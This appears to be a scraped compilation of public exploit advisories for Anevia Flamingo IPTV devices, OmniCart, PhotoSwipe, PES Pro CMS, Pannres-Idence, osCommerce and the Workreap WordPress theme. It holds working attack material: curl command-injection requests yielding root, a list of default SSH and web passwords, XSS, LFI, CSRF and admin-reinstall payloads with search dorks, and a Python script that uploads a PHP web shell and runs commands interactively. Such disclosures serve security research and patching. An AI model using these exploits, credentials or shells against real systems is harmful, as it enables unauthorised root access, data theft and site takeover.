Anevia Flamingo XL version 3.6.20 suffers from an authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges.

    Anevia Flamingo XL 3.6.20 Authenticated Root Remote Code ExecutionVendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.6.20, 3.2.9                  Hardware revision 1.1, 1.0                  SoapLive 2.4.1, 2.0.3                  SoapSystem 1.3.1Summary: Flamingo XL, a new modular and high-density IPTV head-endproduct for hospitality and corporate markets. Flamingo XL captureslive TV and radio content from satellite, cable, digital terrestrialand analog sources before streaming it over IP networks to STBs, PCsor other IP-connected devices. The Flamingo XL is based upon a modular4U rack hardware platform that allows hospitality and corporate videoservice providers to deliver a mix of channels from various sourcesover internal IP networks.Desc: The affected device suffers from authenticated remote codeexecution vulnerability. A remote attacker can exploit this issueand execute arbitrary system commands granting her system accesswith root privileges.Tested on: GNU/Linux 3.1.4 (x86_64)           Apache/2.2.15 (Unix)           mod_ssl/2.2.15           OpenSSL/0.9.8g           DAV/2           PHP/5.3.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5779Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php13.04.2023--> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 192.168.1.1:80...* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)> POST /admin/time.php HTTP/1.1> Host: 192.168.1.1> User-Agent: curl/8.0.1> Accept: */*> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4> Content-Length: 32> Content-Type: application/x-www-form-urlencoded>} [32 bytes data]100    32    0     0  100    32      0     25  0:00:01  0:00:01 --:--:--    25< HTTP/1.1 302 Found< Date: Thu, 13 Apr 2023 23:54:15 GMT< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6< X-Powered-By: PHP/5.3.6< Expires: Thu, 19 Nov 1981 08:52:00 GMT< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0< Pragma: no-cache* Please rewind output before next send< Location: /admin/time.php< Transfer-Encoding: chunked< Content-Type: text/html<* Ignoring the response-body{ [5 bytes data]100    32    0     0  100    32      0     19  0:00:01  0:00:01 --:--:--    19* Connection #0 to host 192.168.1.1 left intact* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'* Switch from POST to GET* Found bundle for host: 0x1de6c6321b0 [serially]* Re-using existing connection #0 with host 192.168.1.1> POST /admin/time.php HTTP/1.1> Host: 192.168.1.1> User-Agent: curl/8.0.1> Accept: */*> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4>< HTTP/1.1 200 OK< Date: Thu, 13 Apr 2023 23:54:17 GMT< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6< X-Powered-By: PHP/5.3.6< Expires: Thu, 19 Nov 1981 08:52:00 GMT< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0< Pragma: no-cache< Transfer-Encoding: chunked< Content-Type: text/html<{ [13853 bytes data]14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br />    <----------------------<<14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br />    <----------------------<<100 33896    0 33896    0     0  14891      0 --:--:--  0:00:02 --:--:--   99k* Connection #0 to host 192.168.1.1 left intact

Anevia Flamingo XL 3.6.20 Authenticated Root Remote Code Execution

Anevia Flamingo XS version 3.6.5 suffers from an authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges.

    Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code ExecutionVendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.6.5                  Hardware revision: 1.1                  SoapLive 2.4.0                  SoapSystem 1.3.1Summary: Flamingo XL, a new modular and high-density IPTV head-endproduct for hospitality and corporate markets. Flamingo XL captureslive TV and radio content from satellite, cable, digital terrestrialand analog sources before streaming it over IP networks to STBs, PCsor other IP-connected devices. The Flamingo XL is based upon a modular4U rack hardware platform that allows hospitality and corporate videoservice providers to deliver a mix of channels from various sourcesover internal IP networks.Desc: The affected device suffers from authenticated remote codeexecution vulnerability. A remote attacker can exploit this issueand execute arbitrary system commands granting her system accesswith root privileges.Tested on: GNU/Linux 3.14.29 (x86_64)           Apache/2.2.22 (Debian)           PHP/5.6.0-0anevia2Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5778Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php13.04.2023--$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data        <td>uid=33(www-data)</td>          <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>        <td>gid=33(www-data)</td>          <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>        <td>groups=33(www-data),6(disk),25(floppy)</td>          <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>---$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root        <td>uid=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>        <td>gid=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>        <td>groups=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>

Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution

Anevia Flamingo XL/XS versions 3.6.20 and 3.2.9 have a weak set of default and hardcoded administrative credentials that can be easily guessed in remote password attacks and gain full control of the system.

    Anevia Flamingo XL/XS 3.6.x Default/Hard-coded CredentialsVendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.6.20, 3.2.9                  Hardware revision 1.1, 1.0                  SoapLive 2.4.1, 2.0.3                  SoapSystem 1.3.1Summary: Flamingo XL, a new modular and high-density IPTV head-endproduct for hospitality and corporate markets. Flamingo XL captureslive TV and radio content from satellite, cable, digital terrestrialand analog sources before streaming it over IP networks to STBs, PCsor other IP-connected devices. The Flamingo XL is based upon a modular4U rack hardware platform that allows hospitality and corporate videoservice providers to deliver a mix of channels from various sourcesover internal IP networks.Desc: The device uses a weak set of default and hard-coded administrativecredentials that can be easily guessed in remote password attacks andgain full control of the system.Tested on: GNU/Linux 3.14.29 (x86_64)           Apache/2.2.22 (Debian)           PHP/5.6.0Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5777Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5777.php13.04.2023--SSH: root:aneviaSSH: enable:parisWEB: admin:parisWEB: monitor:aneviaOEM: monitor:aneviaOEM: monitor:telesteOEM: monitor:envivioOEM: monitor:blankom

Anevia Flamingo XL/XS 3.6.x Default / Hardcoded Credentials 

OmniCart version 3.4.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/32794/ - Pixobit Solutions                  ││  Vendor   : OmniCart - https://omnicartshop.com/                                       ││  Software : OmniCart 3.4.0                                                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /GET parameter 'lang' is vulnerable to RXSShttps://website/?lang=ar&ms4sp"><script>alert(1)</script>ffj2=1Path: /index.php/searchGET parameter 'search' is vulnerable to RXSShttps://website/index.php/search?search=123&h45te"><script>alert(1)</script>khuqf=1[-] Done

OmniCart 3.4.0 Cross Site Scripting

PhotoSwipe version 5.3.7 suffers from an arbitrary file download vulnerability.

    ===========================================================================================| # Title     : PhotoSwipe 5.3.7 Arbitrary File Download Vulnerability                    || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://photoswipe.com/                                                   |  | # Dork      :                                                                           |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : download?path=/uploads/images/support/download/index.php[+] Payload enables you to download empty files .[+] https://127.0.0.1/novakon.com.tw/common/frontend/download?path=/uploads/images/support/download/index.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

PhotoSwipe 5.3.7 Arbitrary File Download

PES Pro CMS version 1.9.7 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : PES Pro CMS - v1.9.7 Reinstall add admin Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://download1580.mediafire.com/3e3q3pr2g20g/jt6w98fdfyqk0s1/pes.zip                                             |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /install/?step=4 =====> http://127.0.0.1/zarabiarapl/install/?step=4[+] Set new user or password .[+] Admin panel : http://zarabiara.pl/admin-panel/index.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |                                                                                                                                      |=======================================================================================================================================

PES Pro CMS 1.9.7 Add Administrator

Pannres-Idence CMS version 7.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Pannres-idence CMS 7.3 CSRF Vulnerability                                                                          |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |   
| # Vendor    : https://codecanyon.net/item/pannresidence-classified-ads-php-script/19960675?s_rank=189                            |    
| # Dork      : "Bylancer, All right reserved"                                                                                     |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html Will modify the password for the site manager, as well as change the e-mail.

[+] save code as poc.html .

<form class="form-horizontal" action="http://127.0.0.1/pannresidencecom/backend/add_newPassword.php" name="form2" id="form2">

                            <fieldset>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="password" id="password" class="form-control" placeholder="Your new password." type="password">  
                                    </div>  
                                </div>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">

                                    </div>  
                                </div>

                                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="newEmail" value="" class="form-control" type="email">

                                    </div>  
                                </div>

                                                            </fieldset>

                            <div class="">  
                                <div class="row">  
                                    <div class="col-md-12">  
                                        <button class="btn btn-default" type="clear">  
                                            Cancel  
                                        </button>

                                        <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">  
                                            <i class="fa fa-save"></i>  
                                            Submit  
                                        </button>  
                                    </div>  
                                </div>  
                            </div>

                        </form>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Pannres-Idence CMS 7.3 Cross Site Request Forgery

osCommerce version 4 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : oscommerce V4 LFI Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.oscommerce.com/                                                                                        |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 62  : https://github.com/osCommerce/osCommerce-V4/blob/main/install/index.php[+] http://locqlhost/install/index.php?rootPath=../../includes/local/configure.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

osCommerce 4 Local File Inclusion

WordPress theme Workreap version 2.2.2 suffers from a remote shell upload vulnerabilities.

    # Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution# Dork: inurl:/wp-content/themes/workreap/# Date: 2023-06-01# Category : Webapps# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)# Version: 2.2.2# Tested on: Windows/Linux# CVE: CVE-2021-24499import requestsimport randomimport stringimport sysdef usage():    banner = '''    NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution    usage: python3 Workreap_rce.py <URL>     example for linux : python3 Workreap_rce.py https://www.exploit-db.com    example for Windows : python Workreap_rce.py https://www.exploit-db.com    '''    print(f"{BOLD}{banner}{ENDC}")def upload_file(target):    print("[ ] Uploading File")    url = target + "/wp-admin/admin-ajax.php"    body = "<?php echo '" + random_str + "';?>"    data = {"action": "workreap_award_temp_file_uploader"}    response = requests.post(url, data=data, files={"award_img": (file_name, body)})    if '{"type":"success",' in response.text:        print(f"{GREEN}[+] File uploaded successfully{ENDC}")        check_php_file(target)    else:        print(f"{RED}[+] File was not uploaded{ENDC}")def check_php_file(target):    response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name)    if random_str in response_2.text:        print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")        print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name)        question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")        if question == "y" or question == "Y":            print("[ ] Uploading Shell ")            get_rce(target)        else:            usage()    else:        print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}")def get_rce(target):    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"    body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'    data = {"action": "workreap_award_temp_file_uploader"}    response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)})    print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")    while True:        command = input(f"{YELLOW}Enter a command to execute: {ENDC}")        print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}")        response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}")        print(f"{GREEN}{response_4.text}{ENDC}")if __name__ == "__main__":    global GREEN , RED, YELLOW, BOLD, ENDC    GREEN = '\033[92m'    RED = '\033[91m'    YELLOW = '\033[93m'    BOLD = '\033[1m'    ENDC = '\033[0m'    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"    random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))    try:        upload_file(sys.argv[1])    except IndexError:            usage()    except requests.exceptions.RequestException as e:        print("\nPlease Enter Valid Address")

WordPress Workreap 2.2.2 Shell Upload

Once the admin establishes a secure shell session, she gets dropped into a sandboxed environment using the login binary that allows specific set of commands. One of those commands that can be exploited to escape the jailed shell is traceroute. A remote attacker can breakout of the restricted environment and have full root access to the device.

Title: Anevia Flamingo XL 3.2.9 (login) Remote Root Jailbreak  
Advisory ID: ZSL-2023-5780  
Type: Local/Remote  
Impact: System Access, DoS, Security Bypass  
Risk: (4/5)  
Release Date: 11.06.2023

**Summary**

Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

**Description**

Once the admin establishes a secure shell session, she gets dropped into a sandboxed environment using the login binary that allows specific set of commands. One of those commands that can be exploited to escape the jailed shell is traceroute. A remote attacker can breakout of the restricted environment and have full root access to the device.

**Vendor**

Ateme - https://www.ateme.com

**Affected Version**

3.2.9  
Hardware revision 1.0  
SoapLive 2.0.3

**Tested On**

GNU/Linux 3.1.4 (x86\_64)  
Apache/2.2.15 (Unix)  
mod\_ssl/2.2.15  
OpenSSL/0.9.8g  
DAV/2  
PHP/5.3.6

**Vendor Status**

\[13.04.2023\] Vulnerability discovered.  
\[13.04.2023\] Vendor contacted.  
\[10.06.2023\] No response from the vendor.  
\[11.06.2023\] Public security advisory released.

**PoC**

anevia\_jailbreak.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5777.php

**Changelog**

\[11.06.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Tag

#php